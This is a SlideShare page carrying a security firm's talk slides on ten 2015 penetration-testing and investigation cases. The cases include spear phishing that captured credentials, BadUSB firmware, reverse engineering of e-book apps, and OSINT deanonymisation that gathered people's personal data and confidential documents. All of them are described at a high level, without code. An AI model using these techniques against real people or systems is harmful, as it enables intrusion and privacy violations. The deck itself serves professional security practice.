SlideShare a Scribd company logo

Примеры работ «Перспективного мониторинга» за 2015 год

Download as PPTX, PDF
Advanced monitoring
Advanced monitoring

Десятка интересных практических примеров наших работ за 2015 год. Доклад на RuCTF 2016.

Technology
1 of 28
White hat Cases of the year 2015 TOP-10 Maxim Avdyunin
LLC Advanced Monitoring Corporate Group
Advanced Monitoring Criminal Code of Russia. Article 272. Illegal Accessing of Computer Information. Criminal Code of Russia. Article 273. Creation, Use, and Dissemination of Harmful Computer Viruses Criminal Code of Russia. Article 274. Violation of Rules for the Operation of Computers, Computer Systems, or Their Networks vs We are the white hat hackers!
Informational development and Communications ministry of the Perm Territory The Federal Service for State Registration, Cadastre and Cartography (Rosreestr) Khabarovsk Territory government JSC Russian Railways PJSC «Uralkali» etc. Customer List Advanced Monitoring
Information Security Audit Software Security AuditPenetration testing Software development IS Incident Monitoring Digital Forensics Competitive Intelligence
Our arsenal Network Scanners IP-Tools nmap Vulnerability Scanners MaxPatrol Nessus Traffic Analyzers Wireshark Intercepter-ng Ettercap-ng GigaStor Tcpdump Web Vulnerability Scanner Acunetix Burp Suite Nikto arachni sqlmap Exploit frameworks Metasploit Online bases: 0day.today rapid7.com exploit-db.com Static Analyzers PVS-Studio Cppcheck Clang SonarQUBE Disassemblers / Debuggers IDA OllyDbg WinDbg Immunity Debagger GDB Brute force software hydra John the Ripper hashcat Developer tools Visual Studio Eclipse IDLE
Cases of the year Top 10
Case 1/10 «Bad news» Client Government contractor Task and setting Perform a black box penetration testing Work done A spear phishing attack on client personnel was performed with two “news” letters about parking fees and pensions, containing web link to a script, that intercepted user authentication information
Case 1/10 «Bad news» Results  More then a half of staff followed at least one of the links  Nobody reported suspicious letters to a client’s Information Security Department  Client’s IT-infrastructure has been fully compromised during the testing  Information Security Department activity has been logged and log was included in a final report
Case 2/10 «Leaky front-end» Client Large governmental organization Task and setting Perform a server-client sales system information security audit Work done Client terminal reverse engineering, its web-interface instrumental examination, and also penetration testing and fuzzing of its server components have been performed
Results  Fuzzing procedure that guaranteed server malfunction has been developed  A variety of vulnerabilities have been found in client software. Those vulnerabilities could allow an attacker to: o Tamper with the information on the client o Send modified data to the server o Clone client terminals Case 2/10 «Leaky front-end»
Case 3/10 «Shakespearean tragedy» Client A theater Setting Leak of confidential financial information about directory salary It’s publication on the Internet Backlash from Client’s personnel Task Find the source of the leak and people responsible
Case 3/10 «Shakespearean tragedy» Work done Leaked materials were analyzed and a list of potential malefactors was created Information on their computers was copied and examined Source data searched in the file archives and potential leakage paths were determined Results Leakage sources were determined and recommendations for their closure were made Client was given a list of suspects
Case 4/10 «Blowing the lid off» Client Shipment tracking information provider Task and setting Some web-sites offered for sale information distributed by our Client without any legal ways to. The task was to find out how they get the information and if possible deanomize them Work done To complete the task an open source intelligence research was performed and sites of interest were analyzed instrumentally
Case 4/10 «Blowing the lid off» Results The following information has been acquired:  The list of people affiliated with the web resources in question  Their personal and contact information, social relations, etc.  Confidential information, legal documents in particular
Case 5/10 «Watchmen» Client Large IT-Company Task and setting A Client asked Advanced monitoring to develop a system of information security incident monitoring in his network and protocols for an on-the-spot incident response, and to create corresponding rules for the corporate intrusion detection system. Work done  Advanced Monitoring has established an Information Security Operation Center (AM ISOC)
 AM ISOC has been integrated with Client’s network infrastructure and AM instrumental base (network scanners, traffic analyzers, etc)  Detection and response protocols have been established and tested in “combat environment” Results During a five months period:  29 information security incidents were detected and handled  34 signatures for Client IDS were developed Case 5/10 «Watchmen»
Case 6/10 «The Star-Spangled Scare» Client Large IT-company Task and setting Investigate an incident taken place in client’s network Work done Monitoring of a Client’s network showed an attempt of a ShellShock attack. Client’s resources were not vulnerable to the attack and no harm was done. Attack analysis showed that an intruder had been sending queries in the search for vulnerable resources from San-Antonio, US.
Connecting to a Command&Control server with the observation purpose showed that about 300 victims were successfully attacked and “zombified”. One of the infected IP-addresses turned out to belong to a Russian hosting provider «Radiosvyaz». Among the services hosted on that IP an e-mail server, operating a mail domain of a large regional generation company was found. As it turned out it was hacked by our intruder. Results Owners of a server were informed of the compartmentation of their web resource and it’s use as a part of a botnet. Case 6/10 «The Star-Spangled Scare»
Client Electronic publisher Task and setting Perform a security audit of a client application of an e-book distribution platform. Check the possibility of book theft. Work done Within the framework of the project an Android, iOS and Windows 8.1 versions of a client application for e-book download and read were reverse engineered. Research also included checking for traffic interception possibilities for the risk of unauthorized access to a copyrighted material. Case 7/10 «Booky buccaneers»
Case 7/10 «Booky buccaneers» Results  Three client application vulnerabilities were found and exploited  Unauthorized access to a distributed content and account data was gained  One server application vulnerability was found  Set of remedial measures for the vulnerabilities found and suggestions for the increase of the platform overall security were proposed
Case 8/10 «USB maneuvers» Client A large industrial company Task and setting Industrial facility dealing with national security information turned to Advanced monitoring for planning and organizing information security maneuvers with “infected” USB-drives scattered on client’s premises and collecting information of their usage after their connection to a computer.
Case 8/10 «USB maneuvers» Work done and results AM developed a USB-flash firmware suitable for a BadUSB attack that enabled an emulation of a two different devices after connecting that special firmware flash to a computer. After that in course of the attack a devise emulating a keyboard send a sequence of instructions that run a (undetectable by antivirus software) script on a victims machine. In current case potentially malicious script just sent information of the flash usage to a LAN server.
Case 9/10 «Wireless mayhem» Client Large IT-company Task and setting Check Client’s office space in order to detect unauthorized Wi-Fi hotspots.
Case 9/10 Work done A methodology of the use of laptop, Wi-Fi antenna and special software was created. Using this methodology Client’s office space was consistently examined. Wi-Fi signal map was build and all sources of the signal were found. Results Client’s office space of 30 rooms on two floors of the building was checked for hotspots. 10 legal and 25 illegal hotspots were found. «Wireless mayhem»
Case 10/10 «AM — the Privacy Protector» Client Large IT-company Task and setting Check if Windows 10 really spy on users Make a list of recommendations to disable such functionality
Case 10/10 «AM — the Privacy Protector» Work done and results Available recommendations were accumulated, checked (with Wireshark) and improved. A specialized tool for selective implementation of those recommendations was developed. Results An installation image with all recommendations applied was made and given to the Client The software developed was published openly: http://amonitoring.ru/cc/program/am-privacy- protector-w10/ And our experience and all the recommendations were also published: www.anti- malware.ru/analytics/Threats_Analysis/Windows_10_Threshold_2
Thanks for your time! Maxim Avdyunin LLC Advanced Monitoring info@AMonitoring.ru

Recommended

Российская криптография: блочные шифры и их режимы шифрования (Russian crypto...
Российская криптография: блочные шифры и их режимы шифрования (Russian crypto...Российская криптография: блочные шифры и их режимы шифрования (Russian crypto...
Российская криптография: блочные шифры и их режимы шифрования (Russian crypto...Advanced monitoring
 
Анализ защиты мобильных приложений Facebook, Instagram, LinkedIn, Вконтакте и...
Анализ защиты мобильных приложений Facebook, Instagram, LinkedIn, Вконтакте и...Анализ защиты мобильных приложений Facebook, Instagram, LinkedIn, Вконтакте и...
Анализ защиты мобильных приложений Facebook, Instagram, LinkedIn, Вконтакте и...Advanced monitoring
 
Типовые сценарии атак на современные клиент-серверные приложения
Типовые сценарии атак на современные клиент-серверные приложенияТиповые сценарии атак на современные клиент-серверные приложения
Типовые сценарии атак на современные клиент-серверные приложенияAdvanced monitoring
 
Кто и как атаковал российские организации в 2016-ом. Статистика и тенденции.
Кто и как атаковал российские организации в 2016-ом. Статистика и тенденции.Кто и как атаковал российские организации в 2016-ом. Статистика и тенденции.
Кто и как атаковал российские организации в 2016-ом. Статистика и тенденции.Advanced monitoring
 
Юрий Чемёркин (Yury Chemerkin) Owasp russia 2016
Юрий Чемёркин (Yury Chemerkin) Owasp russia 2016Юрий Чемёркин (Yury Chemerkin) Owasp russia 2016
Юрий Чемёркин (Yury Chemerkin) Owasp russia 2016Advanced monitoring
 
Игнорируем уязвимости сегодня? Расплачиваемся завтра!
Игнорируем уязвимости сегодня? Расплачиваемся завтра!Игнорируем уязвимости сегодня? Расплачиваемся завтра!
Игнорируем уязвимости сегодня? Расплачиваемся завтра!Advanced monitoring
 
Расследование инцидентов ИБ с помощью открытых интернет-источников
Расследование инцидентов ИБ с помощью открытых интернет-источниковРасследование инцидентов ИБ с помощью открытых интернет-источников
Расследование инцидентов ИБ с помощью открытых интернет-источниковAdvanced monitoring
 
Vulnerability Prevention. Управляем уязвимостями – предупреждаем атаки
Vulnerability Prevention. Управляем уязвимостями – предупреждаем атакиVulnerability Prevention. Управляем уязвимостями – предупреждаем атаки
Vulnerability Prevention. Управляем уязвимостями – предупреждаем атакиAdvanced monitoring
 

Recommended

Российская криптография: блочные шифры и их режимы шифрования (Russian crypto...
Российская криптография: блочные шифры и их режимы шифрования (Russian crypto...Российская криптография: блочные шифры и их режимы шифрования (Russian crypto...
Российская криптография: блочные шифры и их режимы шифрования (Russian crypto...Advanced monitoring
 
Анализ защиты мобильных приложений Facebook, Instagram, LinkedIn, Вконтакте и...
Анализ защиты мобильных приложений Facebook, Instagram, LinkedIn, Вконтакте и...Анализ защиты мобильных приложений Facebook, Instagram, LinkedIn, Вконтакте и...
Анализ защиты мобильных приложений Facebook, Instagram, LinkedIn, Вконтакте и...Advanced monitoring
 
Типовые сценарии атак на современные клиент-серверные приложения
Типовые сценарии атак на современные клиент-серверные приложенияТиповые сценарии атак на современные клиент-серверные приложения
Типовые сценарии атак на современные клиент-серверные приложенияAdvanced monitoring
 
Кто и как атаковал российские организации в 2016-ом. Статистика и тенденции.
Кто и как атаковал российские организации в 2016-ом. Статистика и тенденции.Кто и как атаковал российские организации в 2016-ом. Статистика и тенденции.
Кто и как атаковал российские организации в 2016-ом. Статистика и тенденции.Advanced monitoring
 
Юрий Чемёркин (Yury Chemerkin) Owasp russia 2016
Юрий Чемёркин (Yury Chemerkin) Owasp russia 2016Юрий Чемёркин (Yury Chemerkin) Owasp russia 2016
Юрий Чемёркин (Yury Chemerkin) Owasp russia 2016Advanced monitoring
 
Игнорируем уязвимости сегодня? Расплачиваемся завтра!
Игнорируем уязвимости сегодня? Расплачиваемся завтра!Игнорируем уязвимости сегодня? Расплачиваемся завтра!
Игнорируем уязвимости сегодня? Расплачиваемся завтра!Advanced monitoring
 
Расследование инцидентов ИБ с помощью открытых интернет-источников
Расследование инцидентов ИБ с помощью открытых интернет-источниковРасследование инцидентов ИБ с помощью открытых интернет-источников
Расследование инцидентов ИБ с помощью открытых интернет-источниковAdvanced monitoring
 
Vulnerability Prevention. Управляем уязвимостями – предупреждаем атаки
Vulnerability Prevention. Управляем уязвимостями – предупреждаем атакиVulnerability Prevention. Управляем уязвимостями – предупреждаем атаки
Vulnerability Prevention. Управляем уязвимостями – предупреждаем атакиAdvanced monitoring
 
Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demoHarshalMandlekar2
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxBkGupta21
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
What is Artificial Intelligence?????????
What is Artificial Intelligence?????????What is Artificial Intelligence?????????
What is Artificial Intelligence?????????blackmambaettijean
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by HubspotMarius Sescu
 
Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTEverything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTExpeed Software
 

More Related Content

Recently uploaded

Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demoHarshalMandlekar2
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxBkGupta21
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
What is Artificial Intelligence?????????
What is Artificial Intelligence?????????What is Artificial Intelligence?????????
What is Artificial Intelligence?????????blackmambaettijean
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 

Recently uploaded (20)

Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demo
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
What is Artificial Intelligence?????????
What is Artificial Intelligence?????????What is Artificial Intelligence?????????
What is Artificial Intelligence?????????
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 

Featured

2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by HubspotMarius Sescu
 
Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTEverything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTExpeed Software
 
Product Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsProduct Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsPixeldarts
 
How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthHow Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthThinkNow
 
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfAI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfmarketingartwork
 
PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024Neil Kimberley
 
Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)contently
 
How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024Albert Qian
 
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsSocial Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsKurio // The Social Media Age(ncy)
 
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Search Engine Journal
 
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summarySpeakerHub
 
ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd Clark Boyd
 
Getting into the tech field. what next
Getting into the tech field. what next Getting into the tech field. what next
Getting into the tech field. what next Tessa Mero
 
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentGoogle's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentLily Ray
 
Time Management & Productivity - Best Practices
Time Management & Productivity - Best PracticesTime Management & Productivity - Best Practices
Time Management & Productivity - Best PracticesVit Horky
 
The six step guide to practical project management
The six step guide to practical project managementThe six step guide to practical project management
The six step guide to practical project managementMindGenius
 
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...RachelPearson36
 

Featured (20)

2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot
 
Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTEverything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPT
 
Product Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsProduct Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage Engineerings
 
How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthHow Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental Health
 
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfAI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
 
Skeleton Culture Code
Skeleton Culture CodeSkeleton Culture Code
Skeleton Culture Code
 
PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024
 
Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)
 
How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024
 
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsSocial Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie Insights
 
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024
 
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary
 
ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd
 
Getting into the tech field. what next
Getting into the tech field. what next Getting into the tech field. what next
Getting into the tech field. what next
 
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentGoogle's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search Intent
 
How to have difficult conversations
How to have difficult conversations How to have difficult conversations
How to have difficult conversations
 
Introduction to Data Science
Introduction to Data ScienceIntroduction to Data Science
Introduction to Data Science
 
Time Management & Productivity - Best Practices
Time Management & Productivity - Best PracticesTime Management & Productivity - Best Practices
Time Management & Productivity - Best Practices
 
The six step guide to practical project management
The six step guide to practical project managementThe six step guide to practical project management
The six step guide to practical project management
 
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
 

Примеры работ «Перспективного мониторинга» за 2015 год

  • 1. White hat Cases of the year 2015 TOP-10 Maxim Avdyunin
